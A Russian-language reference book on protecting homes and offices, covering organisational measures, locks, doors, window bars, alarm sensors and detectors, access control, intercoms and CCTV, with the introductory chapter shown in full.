В этом разделе онлайновой библиотеки представлены материалы о промышленных образцах электронных систем ограничения доступа отечественного и зарубежного производства, предназначенных для охраны квартир, домов, офисов, учреждений и т.п.
Содержатся основные технические характеристики и функциональные возможности новейших систем ограничения доступа, в том числе и оборудование, использующее передовую технологию "Touch Memory". В доступной форме приведены сведения о различных домофонных системах и телевизионных системах наблюдения, а также схемы подключения их на охраняемых объектах.
Устройства охраны и сигнализации, устанавливаемые на объектах вместе с кодовыми замками и металлическими решетками, обеспечивают почти 100-процентную защиту от несанкционированных вторжений. В справочнике приведены сведения для изготовления, сборки, монтажа, регулировки и ремонта сторожевых и сигнальных устройств, даны их принципиальные электрические схемы, типы и моточные данные сетевых понижающих трансформаторов питания.
Рассмотрены оригинальные схемные решения электронных и кодовых замков, описана логика их работы и принцип действия. Приведены схемы многофункциональных охранных и пожарных систем, даны рекомендации по их монтажу и настройке.
Диск предназначен для широкого круга пользователей, для всех, кто желает обеспечить надежную защиту своей собственности. Представляет интерес для специалистов, занимающихся вопросами охраны и безопасности различных объектов.
Раздел 1.
Нынешняя ситуация в стране диктует свои условия, вынуждающие нас вносить коррективы в уже ставшую привычной статью расходов. Если ранее мы платили налоги и рассчитывали на оперативность и компетентность правоохранительных органов в случаях угрозы своей безопасности и безопасности своего имущества, то сейчас вынуждены заботиться о себе сами.
В этом случае на помощь Вам могут прийти мощные механические запоры — дешево, но ненадежно, охранники в камуфляжной форме — недешево и также ненадежно, либо электронные системы охраны, сигнализации и ограничения доступа, которым не нужны деньги, не страшны жара, холод и работа по 24 часа в сутки, которые не имеют вредных привычек и не знают, что такое усталость. Системы охраны, сигнализации и ограничения доступа очень разнообразны и непохожи друг на друга. Не трудно догадаться, что таких электронных устройств существует превеликое множество, отобрать из которого то, что необходимо для решения конкретной задачи по охране вашей собственности очень и очень непросто.
После того как Вы приняли решение о необходимости оборудования своего жилища, офиса или помещений предприятия охранной системой, перед Вами неизбежно встанет вопрос: «Как это сделать? Кому можно довериться? На чем остановить свой выбор?». Естественно, самым очевидным и, в общем-то, правильным решением будет обратиться к профессионалам. Но помощь специалистов высокого уровня стоит недешево. Кроме того, можно нарваться на других «специалистов», помощь которых может еще более усугубить выше положение.
Если Вы считаете, что в состоянии самостоятельно решить эту проблему, эта книга для Вас. В ней Вы найдете информацию о существующих и представленных на российском рынке разнообразных системах охраны и ограничения доступа отечественного и зарубежного производства и принципах их работы, на основании которой сможете сравнить их технические характеристики и стоимостные показатели, получить представление о способах установки и выборе этих систем. Все это, несомненно, сэкономит ваше время и деньги, а также позволит более уверенно чувствовать себя даже при общении со специалистами-профессионалами охранного мира.
Книга является продолжением уже знакомой многим серии справочных пособий, посвященных вопросам защиты собственности и информации. В ней авторами сделана попытка систематизировать обширный разрозненный материал о способах защиты и охраны дома, офиса, предприятия от взлома, порчи, пожара и т. п. В книге приведена информация о различных устройствах ограничения доступа, системах видеонаблюдения, датчиках охранных сигнализаций, от простых устройств до сложных электронных систем.
Первая глава книги посвящена вопросам организации охраны, составу необходимого оборудования, правилах его размещения и монтажа. Даны определения основных понятий и терминов, используемых в области систем охраны, что, несомненно, поможет получить общее представление о возможностях современных электронных устройств охраны и выбрать желаемое.
Во второй главе приводятся технические характеристики и краткое описание систем ограничения доступа, от простых электромеханических замков до сложных компьютеризованных систем, как отечественного, так и зарубежного производства.
Описание и технические характеристики различных типов датчиков и детекторов, применяемых в современных охранных устройствах приведены в третьей главе. Здесь же даны рекомендации по их выбору и использованию.
Четвертая и пятая главы книги посвящены аудио- и видеодомофонным системам, системам видеоконтроля и скрытого наблюдения. Рассмотрены принципы работы, способы и варианты установки этих систем.
Шестая глава будет интересна радиолюбителям и всем тем, кто знаком с электроникой и любит мастерить. Здесь приведены описания принципов работы, электрические схемы, печатные платы и рекомендации по монтажу и настройке различных самодельных электронных охранных устройств для дома и офиса.
Мы надеемся, что книга окажется полезной не только тем, кто хочет защитить свой дом или офис от «незваных гостей», но и специалистам в области охраны.
ГЛАВА 1. ОБЩИЕ СВЕДЕНИЯ.
В настоящее время все большее число людей приходит к выводу, что усилий только государственных правоохранительных органов для решения такой проблемы, как охрана и обеспечение безопасности собственного дома, квартиры, дачи и другой собственности, явно не достаточно.
Выбирая какую-либо систему сигнализации, прежде всего, необходимо иметь определенное представление о целях, задачах и принципах построения систем охраны. Поэтому, прежде чем начать рассмотрение конкретных устройств и систем безопасности, разберемся, что же такое безопасность вообще и из каких составных частей она складывается.
Характерной особенностью нашего времени стало ухудшение криминогенной обстановки. Посягательства против собственности составляют больше половины всех преступлений. Достаточно много случаев, когда надежные, но неправильно
Рис. 1.1. Организация безопасности
установленные технические средства не в состоянии защитить вашу собственность. Поэтому для обеспечения полной безопасности не достаточно просто нашпиговать свой дом или офис сложной и дорогостоящей электроникой. Необходимо еще соблюдать ряд мер и правил в повседневной жизни, выполнение которых совсем не обременительно, однако несоблюдение их может привести порой к тяжелым последствиям.
Обеспечение безопасности связано с проведением ряда организационных и технических мероприятий (рис. 1. 1).
1. 1. Организационные мероприятия.
Многие предпочитают не думать о возможных криминальных ситуациях, так как жить в постоянной тревоге просто не возможно. Однако беспечность порой может привести к тяжелым и чаще всего невосполнимыми потерям. Организационные мероприятия связывают в единое целое все составляющие безопасности. Правильность выбора и проведения организационных мероприятий определяет степень вашей безопасности.
Обычно граждане недооценивают важность организационных мероприятий. Это происходит, с одной стороны, потому, что реализовать их нельзя техническими средствами, а с другой — из-за слабой информированности населения по данному вопросу. Многие даже не догадываются, что соблюдение элементарных правил в значительной степени позволит предотвратить возможный материальный или моральный ущерб, финансовые потери дома или на работе.
Организационные меры не требуют больших материальных затрат, и их эффективность подтверждена жизнью. Одной из первых организационных мер, которую осуществляет каждый из нас, хотя и в разной степени, — оценка возможной угрозы и необходимой степени безопасности. С этим сталкивается каждый человек при получении квартиры, выборе помещения под офис, склад и т. д.
В первую очередь, вы должны представлять, каким образом похитители могут проникнуть в ваше жилище или офис, и определить наиболее слабые и уязвимые участки с точки зрения охраны и безопасности. Особое внимание следует обратить на защищенность входных дверей, окон, балконов, подходов к дому и освещение. Незакрытые двери и окна всегда привлекают внимание злоумышленников. Особенно внимательными следует быть жильцам первых и последних этажей многоэтажных зданий. Для проникновения в квартиру часто используются подростки, которым не составляет большого труда проникнуть внутрь помещения через открытую форточку. Следующий момент, — что может заинтересовать преступника, если он все же проник внутрь помещения. Это, как правило, деньги, драгоценности, аудио-, видео-, оргтехника и т. д.
Исходя из этого, вы должны сделать вывод о целесообразности установки охранной сигнализации. Оценив возможную угрозу и установив электронную систему охраны, не следует успокаиваться. Невыполнение простейших правил может свести на нет все ваши усилия и затраты. Вот некоторые из этих правил:
> - не оставляйте ключи от дома или квартиры в замочной скважине, и уж тем более, не стоит прятать их под коврик или в другое укромное местечко. Этим вы облегчаете непрошеному гостю проникновение в квартиру;
> объясняйте детям правила поведения с незнакомыми людьми, постоянно предупреждайте их не давать никому ключи и не открывать дверь незнакомым людям ни под каким предлогом;
> при утере ключа следует заменить цилиндровый механизм замка или установить новый замок;
> двери должны постоянно находиться в запертом состоянии, даже если вы
вышли покурить или зашли к соседу;
> не открывайте дверь, не осмотрев околодверное пространство в дверной
глазок;
> следите за исправностью освещения возле вашего дома или на лестничной площадке;
> следует договориться с соседями о поочередном присмотре за жильем, такая предосторожность не будет лишней;
> оставляйте дома в ваше отсутствие только тех людей, которых вы и члены
вашей семьи хорошо знаете.
Продумать безопасность помещения, способы хранения ценностей, организацию работ с конфиденциальной информацией можете только вы сами, т. к. система организационных мер является ключом к замку, защищающему вашу собственность.
1. 2. Технические мероприятия
Помимо организационных мероприятий, для обеспечения охраны и безопасности необходимо решить комплексную задачу по выбору, установке и эксплуатации технических средств охраны. Системы сигнализации, приобретенные вами, должны надежно срабатывать как при появлении признаков пожара, так и при попытке проникновения в помещение нежелательных личностей. Уже самые простые средства — изгородь или ограждение, через которые трудно перелезть, замки на дверях, которые открываются ключом, а не ногтем, запоры на окнах, несколько удачно расположенных светильников для освещения прилегающей территории, — заставят потенциального преступника сильно призадуматься, прежде чем совершить попытку проникновения. Осуществление технических мер безопасности требует определенных компромиссных решений. Например, правоохранительные органы рекомендуют ставить на окна решетки и устанавливать двойные двери. В то же время пожарные настаивают на том, чтобы в случае необходимости можно было беспрепятственно покинуть помещение. В любом случае всегда нужно следовать здравому смыслу и из всего арсенала методов и технических средств охраны выбирать самый подходящий и сравнительно недорогой.
1. 2. 1. Механические средства охраны
К простым техническим средствам защиты и охраны помещений относятся ограждения, решетки, двери, замки, дверные глазки, переговорные устройства. Рассмотрим особенности эксплуатации и установки этих технических средств.
Решетки
Не многим известно, что двойными рычажными ножницами можно без особых усилий перекусить стальной прут диаметром 10 мм. Поэтому при выборе решетки следует отдать предпочтение бескаркасной, прутья которой замуровываются непосредственно в стену, с расстоянием между прутьями не более 120 мм и толщиной прута не менее 20 мм. Рисунок решетки может быть любым, но наибольшей защищенностью обладают решетки, прутья которых расположены ромбом или крестом.
Ограждения
Для охраны периметров наиболее распространенным средством является ограждение. Оно может выполнять как охранные, так и декоративные функции. Стационарные ограждения требуют больших материальных затрат и длительного времени на их установку, выполняются они, в основном, из бетонных плит.
В настоящее время все чаще используются быстро монтируемые ограждения, состоящие из металлических сеток или секций различного типа. Высота таких ограждений может достигать 2 м. Кроме того, для ограждений может использоваться колючая проволока отечественного или зарубежного производства.
Двери
Металлическая дверь при ее правильном изготовлении и установке обеспечивает высокую степень защиты помещения. При выборе двери необходимо обратить внимание на качество ее изготовления: полотно двери должно плотно прилегать к дверной коробке и не содержать наружных сварных швов, дверные петли должны иметь противосъемное устройство. При установке двери, особенно в зданиях старой постройки, необходимо проверить наличие пустот в стенах и оценить толщину стен. Подозрительные участки стены должны армироваться стальной полосой.
При установке дополнительной двери с замком, отделяющей несколько квартир от лестничной площадки, рекомендуется установить на ней дверной глазок. Такая дверь является средством коллективной защиты, соблюдение правил пользования которым определяет его эффективность.
Механические замки
Определяющим фактором при выборе замка должна быть не цена, а степень защищенности замка. По способу установки замки подразделяются на врезные и накладные. Врезные замки устанавливаются (врезаются) в тело полотна двери. Накладные замки устанавливаются на поверхности двери, они меньше ослабляющее и требуют меньше времени на установку. По принципу действия современные замки можно разделить на следующие типы: рычажные, цилиндрические, ригельные, замки с цилиндровыми механизмами повышенной секретности.
Принцип работы дверных механических замков практически не изменился с момента их изобретения. В рычажном замке затвор (жесткий запирающий засов) имеет прорезь, разделенную двумя выступами, и прижимную пружину. Поворот ключа с плоской бородкой приводит к подъему рычагов, обеспечивая тем самым движение затвора для закрывания (открывания) замка.
Цилиндрический замок содержит комбинацию штифтов и пружин в двух цилиндрах: большом и маленьком. Большой цилиндр называется корпусом. В него вставляется маленький цилиндр, именуемый сердечником или захватывающим цилиндром. Оба цилиндра имеют два ряда отверстий, как правило, не менее пяти в каждом, которые выстраиваются в одну линию, когда засов закрыт. В каждом отверстии прижимная пружина воздействует на штифты так, что верхний штифт заходит в соответствующее отверстие в сердечнике и не дает ему поворачиваться. Ключ, вставленный в сердечник, поднимает соответствующие штифты и совмещает штифт корпуса и штифт сердечника с узким пространством, называемым линией сдвига. После этого ключ может привести в движение шток захватывающего цилиндра, связанный с засовом механически, и закрыть или открыть замок.
Хороший замок должен иметь, по крайней мере, несколько тысяч возможных кодовых комбинаций ключей и сердечников для обеспечения необходимой защиты.
Для увеличения степени защиты механические замки объединяются с электронными устройствами набора кода, считывателями магнитных или электронных карточек. Для открывания двери с таким замком уже не достаточно наличия только ключа.
1. 2. 2. Электронные средства охраны
Для повышения уровня охраны и безопасности используются технические средства более высокого уровня. К ним относятся системы охранной и пожарной сигнализации, системы ограничения доступа, системы телевизионного наблюдения. Отдельно можно выделить автомобильные охранные системы и комплексы на базе ЭВМ, включающие вышеперечисленные системы. Автомобильные охранные устройства подробно описаны в одной из книг данной серии. Поэтому в настоящей книге рассматриваются сигнализационные и охранные системы квартир, офисов, учреждений, складов и т. д.
Перечисленные выше системы могут работать как отдельно, так и в комплексе. Например, телевизионное наблюдение и охрана могут осуществляться либо на большом числе объектов, либо на одном отдельно взятом — квартире или офисе. Системы любой сложности строятся на базе одних и тех же технических
Рис. 1. 2. Состав технических средств охраны и безопасности
устройств (рис. 1. 2). Для обеспечения охраны и безопасности помещений необходимо выбрать соответствующие технические средства, которые в состоянии обеспечить высокую надежность выполнения возложенных на них задач.
Системы охранно-пожарной сигнализации
Системы охранно-пожарной сигнализации предназначены для определения факта несанкционированного проникновения на охраняемую территорию или появления на ней признаков пожара, выдачи сигнала тревоги на пульт охраны и включения исполнительных устройств (сирены, освещения и т. д.). Системы охранно-пожарной сигнализации включают в себя контрольные панели, извещатели (датчики и детекторы), исполнительные устройства, устройства оповещения (сирены, звонки и т. п.) и источники питания.
Контрольная панель
Контрольная панель (приемно-контрольный прибор) — это центральное устройство системы охранной сигнализации, выполненное на базе микроконтроллера, программа которого определяет все функции системы. Контрольная панель может подключаться к компьютеру для обработки и регистрации сигналов тревоги, автоматического анализа состояния датчиков и функционирования всей системы. Контрольные панели управляют исполнительными устройствами: включают сирену, прожектор, дозваниваются по телефонной линии по заданному номеру.
Извещатели
Для регистрации изменений контролируемого параметра в системах охранной сигнализации используются различные извещатели. Извещатель — это устройство, формирующее определенный сигнал об изменении того или иного контролируемого параметра окружающей среды. Извещатели можно условно разделить на датчики и детекторы. Здесь под датчиками будем понимать извещатели, преобразующие физические величины и характеристики (например, тепло, свет, звук и т. п.) в электрический сигнал. Детекторами же будем называть извещатели, включающие в свой состав датчики, схему обработки сигналов и схему принятия решения.
Простые извещатели (датчики) производят аналоговую обработку сигналов, что не всегда обеспечивает необходимую надежность их работы. Повышение надежности работы датчиков обеспечивается применением цифровых методов обработки сигналов. По принципу действия извещатели можно разделить на следующие типы:
> электроконтактные (фольга, провод);
> магнитоконтактные;
> вибродатчики;
> ультразвуковые;
> радиоволновые;
> фотоэлектрические;
> детекторы битого стекла;
> пассивные и активные инфракрасные (ИК) детекторы движения;
> комбинированные.
Датчики и детекторы позволяют контролировать часть охраняемого объекта (объем, плоскость и т. п.), именуемую зоной.
Электроконтактные датчики
Электроконтактные датчики предназначены для регистрации повреждений и разрушения конструкций, на которых они закреплены: стеклянного полотна окон, дверей, стеклоблоков и т. д. в отапливаемых и не отапливаемых помещениях. Они изготавливаются из тонкой алюминиевой фольги толщиной от 0, 008 до 0, 04 мм и шириной не более 12, 5 мм. Фольга имеет клеевой слой. Иногда для тех же целей вместо фольги используют тонкий провод.
Магнитоконтактные датчики
Магнитоконтактные датчики предназначены для регистрации открывания дверей и окон, на которых они установлены. Датчики бывают двух видов: для наружной и скрытной установки. Они выполнены на основе герконов, контакты которых замыкаются или размыкаются при приближении (удалении) постоянного магнита. Подключаются такие датчики к охранным сигнализациям посредством проводного шлейфа.
Вибродатчики
Вибродатчики предназначены для обнаружения преднамеренного повреждения различных строительных конструкций: бетонных стен и перекрытий, кирпичных стен, деревянных (рамы и двери) и потолочных покрытий, а также сейфов и металлических шкафов. Принцип действия вибродатчиков основан на пьезоэффекте или эффекте электромагнитной индукции, когда постоянный магнит перемещается вдоль обмотки катушки и тем самым наводит в ней переменный ток. В отечественной и зарубежной литературе в зависимости от технической реализации такие датчики называют электромагнитными, магниторезонансными или пьезодатчиками.
Ультразвуковые детекторы
Ультразвуковые детекторы предназначены для охраны закрытых помещений и характеризуются высокой чувствительностью и низкой помехоустойчивостью.
Действие их основано на интерференции ультразвуковых колебаний. В состав ультразвукового детектора входят излучатель и приемник. При закрытых окнах и дверях пространство, контролируемое детектором, ограничено, и в точке расположения приемника формируется устойчивая интерференционная картина. При проникновении какого-либо объекта в помещение устойчивость интерференционной картины нарушается и формируется сигнал тревоги.
Радиоволновые детекторы
Радиоволновые детекторы предназначены для регистрации движения в контролируемой зоне. Принцип действия основан на излучении сигнала сверхвысокой частоты и приеме отраженного сигнала, частота которого изменяется при движении нарушителя (эффект Доплера). Эти приборы используются для охраны закрытых помещений и периметров.
Фотоэлектрические датчики
Фотоэлектрические датчики предназначены для охраны внутреннего и внешнего периметров, бесконтактного блокирования пролетов, дверей, коридоров и т. п. Они состоят из передатчика и приемника, разнесенных вдоль линии охраны, и используют сигнал инфракрасного диапазона с длиной волны порядка 1 мкм.
Детекторы битого стекла
Детекторы битого стекла (ДБС) предназначены для регистрации преднамеренного разрушения стеклянных конструкций: окон, витрин и др. Они реагируют на звук бьющегося стекла и удара о стекло, а также анализируют спектр звуковых шумов в помещении, позволяют бесконтактно контролировать целостность стекла размером более 20х20 см.
Пассивные и активные ИК детекторы движения
Детекторы движения предназначены для обнаружения движения теплового объекта в охраняемой зоне. По принципу действия они подразделяются на пассивные и активные. В настоящее время первые находят более широкое применение. Они имеют регулируемые зоны обнаружения, защиту от ложных срабатываний, вызываемых домашними животными и насекомыми. Различаются пассивные детекторы размером зоны обнаружения (20—360°), методами обработки сигнала, конструкцией и т. п. Активные детекторы используются, как правило, для охраны периметров объектов.
Недостатком самых простых и дешевых ИК детекторов движения является низкая помехоустойчивость — они срабатывают даже при возникновении теплового потока, например, из-за прогрева солнцем помещения.
Более совершенные детекторы лишены этого недостатка. Их надежность и стойкость к тепловым помехам обеспечивается многоканальными пироэлементами и сложной электронной обработкой сигнала в самом детекторе. В простых моделях обработка сигналов осуществляется аналоговыми методами, а в более сложных — цифровыми, например, с помощью встроенного процессора.
Комбинированные детекторы
Комбинированные детекторы - это устройства, использующие два разных физических принципа обнаружения движения. В подавляющем большинстве подобных устройств реализованы пассивный ИК и радиоволновый принципы обнаружения движения. Такие приборы, прежде всего, отличает значительно более высокие характеристики обнаружения при крайне низкой вероятности ложных тревог, по сравнению с приборами, использующими только один из принципов обнаружения движения.
Способы подключения извещателей
Системы охранно-пожарной сигнализации по способу подключения извещателей подразделяются на проводные и беспроводные. В первых связь между всеми устройствами системы осуществляется по проводам. Совокупность соединительных проводов, датчиков, детекторов, соединительных коробок, разъемов и т. п. называется шлейфом. С помощью шлейфов формируются зоны охраны. При своей надежности проводные системы менее гибкие, чем беспроводные. В беспроводных системах каждый извещателъ оснащается собственным передатчиком, а контрольная панель — многоканальным приемником. Надежность связи определяется характеристиками приемника и передатчиков, архитектурой здания и уровнем промышленных радиопомех. Дальность связи обычно составляет от 30 до 1000 м. Беспроводные системы сигнализации более удобны при монтаже и использовании, они могут дополняться устройствами дистанционного управления. На отечественном рынке появились беспроводные системы, использующие для связи и питания промышленную сеть переменного тока напряжением 220 В.
Исполнительные устройства
Исполнительные устройства предназначены для передачи информации пользователю или компетентным органам о срабатывании системы охраны путем подачи звукового и (или) светового сигналов или путем автоматического дозвона по телефонной линии связи до заранее определенных абонентов, а также для управления различными механизмами, обеспечивающими усиление безопасности.
К исполнительным устройствам относятся лампы наружного освещения, прожекторы, стробоскопы, сирены, автодозвонщики, блоки электромагнитных реле, электрозамки и т. п.
Прожекторы, лампы наружного освещения и стробоскопы освещают охраняемую территорию и включаются в случае срабатывания сигнализации, привлекая внимание окружающих. Яркая вспышка стробоскопа в темное время суток или в плохо освещенном помещении может ошеломить преступника и на некоторое время вывести его из строя.
Сирены или ревуны издают громкий звуковой сигнал мощностью до 130 дБ, который может быть услышан на расстоянии нескольких сотен метров. Сирены имеют различное оформление и размеры, некоторые из них оборудованы автономным источником питания. Длительность звучания сирены может быть различной и устанавливается по желанию пользователя.
Устройства автоматического дозвона (автодозвонщики, или коммуникаторы) подключаются к телефонной линии и могут дозваниваться в автоматическом режиме до одного или нескольких абонентов в зависимости от логики работы системы охраны. Блоки электромагнитных реле обеспечивают включение мощных исполнительных механизмов и приборов.
Системы ограничения доступа
Системы ограничения доступа предназначены для автоматизированного допуска в помещения только тех пользователей, которым разрешено посещение данного помещения. Они основаны на использовании аппаратно-программных средств, управляющих передвижением людей и транспорта через контролируемые точки прохода. Это могут быть небольшие системы, на 1—3 двери, или системы, контролирующие перемещение нескольких тысяч человек. Идентификация пользователя происходит посредством предъявления электронной или магнитной карточки либо путем ввода определенного цифрового кода. Система ограничения доступа включает в себя считыватели и контроллеры. Кроме того, к системам ограничения доступа можно отнести и аудиодомофонные системы с дистанционным открыванием двери.
Считыватели
Считыватели необходимы для считывания идентификационного кода и передачи его в контроллер. Эти устройства предназначены для преобразования уникального кода кодового ключа в код стандартного формата, передаваемый для анализа и принятия решения в дверной контроллер. Считыватели различаются физическими принципами реализации (пластиковые карточки с магнитной полосой, штриховым кодом, бесконтактные карточки Proximity, ключи и карточки со встроенными интегральными микросхемами и т. п.). Эти устройства располагаются непосредственно возле дверей и других точек прохода, ограничивающих перемещение пользователей (турникет, шлюз и т. п.). Кроме того, они могут выполнять еще ряд таких функций, как управление открыванием дверей, контроль времени открытия двери, контроль одной зоны охраны.
Контроллеры
Контроллер необходим для управления считывателями и исполнительными устройствами. Он принимает решение о доступе конкретного пользователя, предъявившего устройство идентификации, через конкретную точку прохода в конкретное время на основании хранящейся в нем информации о конфигурации системы и правах пользователей системы ограничения доступа. Устройством идентификации является аналог ключа, подтверждающий полномочность прав его владельца и служащий для управления точкой прохода. Контроллер может обслуживать один или несколько считывателей и располагаться на удалении от них. Несколько контроллеров могут образовывать группу, обслуживающую территориально и логически выделяемую часть системы ограничения доступа (этаж, здание, организацию), и именоваться объектом.
Аудиодомофонная система
Аудиодомофонная система предназначена для ограничения доступа посторонних лиц в частные квартиры, дачи, подъезды многоэтажных домов, офисов, банков, медицинских учреждений и др. Она позволяет вести переговоры с посетителями и дистанционно открывать входную дверь в случае необходимости. Кроме того, современные аудиодомофонные устройства позволяют выполнять функции охранной системы.
Системы видеонаблюдения
Системы видеонаблюдения предназначены для визуального наблюдения за охраняемым объектом с помощью телекамер. Они позволяют следить одновременно за одним или несколькими объектами. Камеры наблюдения могут располагаться как внутри помещения, так и снаружи. Задача системы видеонаблюдения состоит в наглядном представлении видеоинформации об оперативной обстановке на контролируемом объекте. Одной из разновидностей таких систем являются видеодомофоны, выполняющие функции дверного глазка и переговорного устройства одновременно. Системы скрытого наблюдения используют миниатюрные видеокамеры с инфракрасной подсветкой для работы в условиях плохого освещения.
Телевизионные системы наблюдения
Самая простейшая система телевизионного (ТВ) наблюдения включает в себя одну или несколько телевизионных камер и монитор или телевизор. Камеры могут устанавливаться на поворотных устройствах снаружи или внутри помещения и позволяют осуществлять круглосуточное наблюдение за охраняемой территорией. Управление системами телевизионного наблюдения в зависимости от их сложности и обстановки на объекте может быть автоматическим или ручным. Совместно с этими системами можно использовать детекторы движения, системы освещения и другие дополнительные устройства.
В системах видеонаблюдения, рассчитанных на использование нескольких камер, на экране одного монитора можно одновременно отображать изображения от всех камер. Для этих целей используются устройства, именуемые квадраторами (делителями экрана). При необходимости изображение от любой камеры можно оперативно развернуть на весь экран. Для последовательного вывода изображений используются мультиплексоры (коммутаторы), которые последовательно подключают видеокамеры к монитору или телевизору.
Системы ТВ наблюдения позволяют создать гибкую и наращиваемую систему безопасности, в которую могут входить не только компоненты телевизионных систем, но и системы сигнализации и ограничения доступа.
Системы скрытого наблюдения
Системы скрытого наблюдения используются для повышения эффективности охраны и устанавливаются там, где необходимо скрыть факт наблюдения. Задача систем скрытого наблюдения — не изучать посетителей, а контролировать ситуацию на охраняемой территории.
С помощью плоской, размером со спичечный коробок, камеры со специальным объективом типа Pin-Hole (камера с вынесенным входным зрачком) и диаметром входного зрачка 0, 8—2, 0 мм можно вести скрытое наблюдение за любой частью помещения. Такие камеры могут устанавливаться в корпусе часов, на дверном косяке, под обоями и т. п.
Другим, более простым, способом такого наблюдения является использование так называемых видеоглазков со сверхширокоугольной оптикой, предназначенных для монтажа в двери. Внешне они ничем не отличаются от обычных дверных глазков. Питание и передача видеосигнала от этих устройств осуществляется по кабелю или радиоканалу.
Видеодомофоны
Видеодомофон — это устройство, которое выполняет функции дверного глазка и переговорного устройства. Видеодомофон позволяет наблюдать пространство перед входной дверью и беседовать с посетителем, находящимся за дверью. Видеокамеру обычно располагают так, чтобы в ее поле зрения попадал максимум околодверного пространства. Многие видеокамеры оснащены инфракрасной подсветкой для работы в условиях плохой освещенности. При оборудовании видеодомофонами жилых домов полезно создавать два уровня охраны:
входной двери подъезда (этажа) и входной двери каждой квартиры.
1. 3. Выбор системы охранной сигнализации
Выбирая какую-либо систему сигнализации, прежде всего, необходимо подумать о том, как соотносятся затраты на ее покупку, сборку и установку с ее надежностью и ценностью того, что она будет охранять. Для большинства из нас наиболее ценными являются собственный дом, квартира, автомобиль и (или) дача. Сохранить их от огня и уберечь от кражи можно многими способами, но если злоумышленник — профессионал в своем деле, то никто не сможет полностью гарантировать надежность охраны. Необходимо помнить, что условия его (злоумышленника) деятельности, как нигде, приучают его к осторожности и оттачивают мастерство. Ошибка для него означает быть пойманным, с поличным или в позже, по оставленным уликам.
Единственным способом перехитрить опытного преступника остается установка такой охранной системы, которую бы он никогда до сих пор не встречал. Поэтому к организации защиты своей собственности необходимо подходить творчески. Не пожалейте времени на обдумывание своей идеи перед тем, как потратить хотя бы рубль на приобретение каких-либо компонентов. В зависимости от того, какие функции будут возложены на систему охраны, вы можете выбрать и скомпоновать различные виды устройств и датчиков в единое целое. Ваша система может использовать контактные и магнитные датчики, датчики движения и битого стекла, видеоглазки с видеомагнитофонами, тревожные кнопки, электронные и кодовые замки.
Задачу защиты помещений нужно решать комплексно, чтобы по нескольку раз не переделывать дизайн помещения и коммуникации. Все системы охраны и сигнализации должны устанавливаться с учетом следующих факторов:
> обеспечения высокой надежности;
> обеспечения минимальной стоимости;
Таблица 1. 1. Пример построения охранных систем
Условные обозначения
ДБС — детектор битого стекла, КЛ — клавиатура;
Акк — аккумулятор; ДУВ — вибродатчик,
КП — контрольная панель; Тр. — трансформатор;
ПИК — пассивный ИК детектор, ТК — тревожная кнопка;
Тлф. — телефон с автодозвоном; МК — магнитный контакт;
F — пожарный датчик,
+ — наличие устройства в системе охраны,
+* — извещатель может быть отключен в режиме присутствия
Продолжение таблицы 1.1
> удобства использования;
> исключения возможного влияния их друг на друга;
> возможности модернизации.
В табл. 1. 1 представлены примерные варианты комплектования систем охраны жилых помещений, приведены ориентировочные стоимости ее составных элементов. Кроме того, показано наиболее логичное, с точки зрения охраны, расположение всех составных частей системы: датчиков, контрольных панелей и
Окончание таблицы 1. 1
устройств набора кода. Помните, что от правильности выбора и использования защитных устройств во многом зависит безопасность лично ваша и вашего имущества. Поэтому при оборудовании помещений охранными системами лучше обратиться к специалистам.
Основные методы «работы» квартирных воров заключены в подборе ключей или взломе двери или окна. Особенно внимательным следует быть жителям первого и последнего этажей многоэтажных домов. В настоящее время участились
кражей с балконов, а также кражи с использованием альпинистского снаряжения. Однако большинство преступников проникают в квартиры через дверь. Типовую дверь в наших квартирах взрослый мужчина может выбить плечом, если она недостаточно укреплена. Поэтому защиту своей собственности следует начинать с дверных запоров и укрепления входной двери. Дверь необходимо запирать на два замка разных систем. Замки должны располагаться на расстоянии не менее 50 см друг от друга. При этом лучше использовать накладные замки, т. к. они не ослабляют полотно двери при установке.
В последнее время граждане все большее предпочтение отдают металлическим дверям, которые при правильной установке обеспечивают высокую степень защиты помещения. Стальные двери выпускаются как отечественными, так и зарубежными производителями. На эти двери устанавливаются, как правило, по два замка: ригельный и «цербер».
При использовании электромеханических замков появляется возможность дистанционного управления входной дверью. Это можно сделать, используя домофонную систему. Сочетание электромеханического замка и такой системы позволит вам, не отрываясь от домашних дел или не покидая рабочего места, выяснить личность, намерение посетителя и впустить его, нажав кнопку открывания двери, если вы этого пожелаете.
В табл. 1. 2 приведены примеры систем дистанционного управления замком входной двери с использованием аудио-, видеодомофонов, специальных карточек-жетонов и устройств набора кодов.
Дистанционное управление замком может осуществляться и при помощи устройств ограничения доступа. При этом двери оснащаются устройствами набора кода (клавиатурами) или считывателями. В первом случае пользователь набирает свой личный код и при наличии права доступа открывает двери. Кодовая клавиатура также позволяет вводить код тревоги в случае угрозы пользователю от постороннего лица. Во втором случае используются специальные кодовые бесконтактные или контактные ключи или карточки.
Отдельно можно выделить системы видеонаблюдения и охраны, примеры построения которых и состав оборудования приведены в табл. 1. 3.
В настоящее время системы телевизионного наблюдения не являются экзотикой. Стоимость наиболее простых систем позволяет использовать их в качестве, например, дверного глазка. Наиболее простая система телевизионного наблюдения включает телекамеру и монитор. Вместо монитора можно использовать обычный телевизор, что еще больше уменьшает стоимость системы. Такая система позволяет наблюдать пространство перед входной дверью или на лестничной площадке. Многие телевизионные камеры оснащены инфракрасной подсветкой, что дает возможность получить качественное изображение даже при отсутствии освещения.
Для того чтобы быть компетентным в вопросах выбора и применения какой-либо охранной системы, необходимо знать разновидности выпускаемых промышленностью систем, их технические характеристики и область применения.
Таблица 1. 2. Дистанционное управление замком входной двери
Таблица 1. 3. Системы видеонаблюдения и охраны
1. 4. Установка систем охранной сигнализации
Установка сигнализации является не таким простым делом, как это может показаться с первого взгляда. Ведь для этого необходимо знать, как и где установить тот или иной датчик, каким проводом сделать соединения и как его проложить по помещению, как проверить работоспособность датчиков и всей системы в целом. Неправильно установленная система охранно-пожарной сигнализации, какой бы совершенной она ни была, — это своеобразный «кусок железа», не способный решить в полном объеме все поставленные задачи по охране помещения, и впустую потраченные деньги. Лучше всего, если такие системы будут устанавливать специалисты-профессионалы вневедомственной охраны или других охранных структур, дающих гарантию на свою работу.
Если все-таки вы считаете, что в состоянии самостоятельно установить охранную систему, потратьте еще несколько минут и ознакомьтесь с приводимыми ниже рекомендациями по данному вопросу.
